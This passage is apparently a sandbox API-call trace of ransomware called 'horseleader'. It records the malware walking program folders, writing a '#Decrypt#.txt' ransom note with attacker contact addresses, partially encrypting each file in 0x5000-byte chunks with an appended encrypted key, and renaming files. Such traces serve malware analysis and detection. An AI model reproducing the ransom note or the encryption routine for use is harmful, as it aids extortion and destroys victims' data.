Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its.horseleader")) returned 1 [0248.353] GetProcessHeap () returned 0x780000 [0248.353] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.353] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xe64da, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ENFR.ITS", cAlternateFileName="")) returned 0 [0248.353] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.353] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\#Decrypt#.txt") returned 78 [0248.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.354] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.354] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.355] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.355] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.355] CloseHandle (hObject=0x158) returned 1 [0248.355] GetProcessHeap () returned 0x780000 [0248.355] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.355] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ESEN", cAlternateFileName="")) returned 1 [0248.356] lstrcmpiW (lpString1="ESEN", lpString2="Windows") returned -1 [0248.356] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN") returned 64 [0248.356] lstrcmpW (lpString1="ESEN", lpString2=".") returned 1 [0248.356] lstrcmpW (lpString1="ESEN", lpString2="..") returned 1 [0248.356] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.356] GetProcessHeap () returned 0x780000 [0248.356] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.356] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*") returned 66 [0248.356] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.356] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.357] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\.") returned 66 [0248.357] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.357] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.357] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.357] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\..") returned 67 [0248.357] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.357] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.357] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9890c900, ftCreationTime.dwHighDateTime=0x1c82168, ftLastAccessTime.dwLowDateTime=0x54a7f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9890c900, ftLastWriteTime.dwHighDateTime=0x1c82168, nFileSizeHigh=0x0, nFileSizeLow=0x38200, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ESEN.DLL", cAlternateFileName="")) returned 1 [0248.357] lstrcmpiW (lpString1="MSB1ESEN.DLL", lpString2="Windows") returned -1 [0248.357] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL") returned 77 [0248.357] StrStrIW (lpFirst="MSB1ESEN.DLL", lpSrch=".horseleader") returned 0x0 [0248.357] lstrcmpW (lpString1="MSB1ESEN.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.357] lstrcmpW (lpString1="MSB1ESEN.DLL", lpString2="_uninstalling_.png") returned 1 [0248.357] lstrlenW (lpString=".testttjffg") returned 11 [0248.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL", lpSrch=".testttjffg") returned 0x0 [0248.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.357] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL") returned 77 [0248.358] StrStrW (lpFirst="MSB1ESEN.DLL", lpSrch=".txt") returned 0x0 [0248.358] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=229888) returned 1 [0248.358] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.358] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.361] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.361] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.363] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x19900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.363] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.363] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.363] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.364] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x33200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.364] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.366] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.366] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.366] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.366] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.366] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.366] CloseHandle (hObject=0x1a4) returned 1 [0248.367] GetProcessHeap () returned 0x780000 [0248.367] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.367] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.horseleader") returned 89 [0248.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll.horseleader")) returned 1 [0248.368] GetProcessHeap () returned 0x780000 [0248.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.368] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22595900, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22595900, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xff7f2, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ESEN.ITS", cAlternateFileName="")) returned 1 [0248.368] lstrcmpiW (lpString1="MSB1ESEN.ITS", lpString2="Windows") returned -1 [0248.368] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS") returned 77 [0248.368] StrStrIW (lpFirst="MSB1ESEN.ITS", lpSrch=".horseleader") returned 0x0 [0248.368] lstrcmpW (lpString1="MSB1ESEN.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.368] lstrcmpW (lpString1="MSB1ESEN.ITS", lpString2="_uninstalling_.png") returned 1 [0248.368] lstrlenW (lpString=".testttjffg") returned 11 [0248.368] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS", lpSrch=".testttjffg") returned 0x0 [0248.368] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.368] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.369] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS") returned 77 [0248.369] StrStrW (lpFirst="MSB1ESEN.ITS", lpSrch=".txt") returned 0x0 [0248.369] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1046514) returned 1 [0248.369] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.369] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.372] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.372] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.372] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x7d3f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.373] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.376] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.376] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.377] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfa7f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.377] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.379] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.380] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.380] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.380] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.380] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.380] CloseHandle (hObject=0x1a4) returned 1 [0248.380] GetProcessHeap () returned 0x780000 [0248.380] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.380] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS.horseleader") returned 89 [0248.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its.horseleader")) returned 1 [0248.382] GetProcessHeap () returned 0x780000 [0248.382] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.382] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c79400, ftCreationTime.dwHighDateTime=0x1be6f42, ftLastAccessTime.dwLowDateTime=0x5ba5ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8c79400, ftLastWriteTime.dwHighDateTime=0x1be6f42, nFileSizeHigh=0x0, nFileSizeLow=0xa5c00, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WT61ES.LEX", cAlternateFileName="")) returned 1 [0248.382] lstrcmpiW (lpString1="WT61ES.LEX", lpString2="Windows") returned 1 [0248.382] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX") returned 75 [0248.382] StrStrIW (lpFirst="WT61ES.LEX", lpSrch=".horseleader") returned 0x0 [0248.382] lstrcmpW (lpString1="WT61ES.LEX", lpString2="#Decrypt#.txt") returned 1 [0248.382] lstrcmpW (lpString1="WT61ES.LEX", lpString2="_uninstalling_.png") returned 1 [0248.382] lstrlenW (lpString=".testttjffg") returned 11 [0248.382] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX", lpSrch=".testttjffg") returned 0x0 [0248.382] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.382] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.383] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX") returned 75 [0248.383] StrStrW (lpFirst="WT61ES.LEX", lpSrch=".txt") returned 0x0 [0248.383] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=678912) returned 1 [0248.383] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.383] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.389] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.389] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x50600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.390] ReadFile (in: hFile=0x1a4, 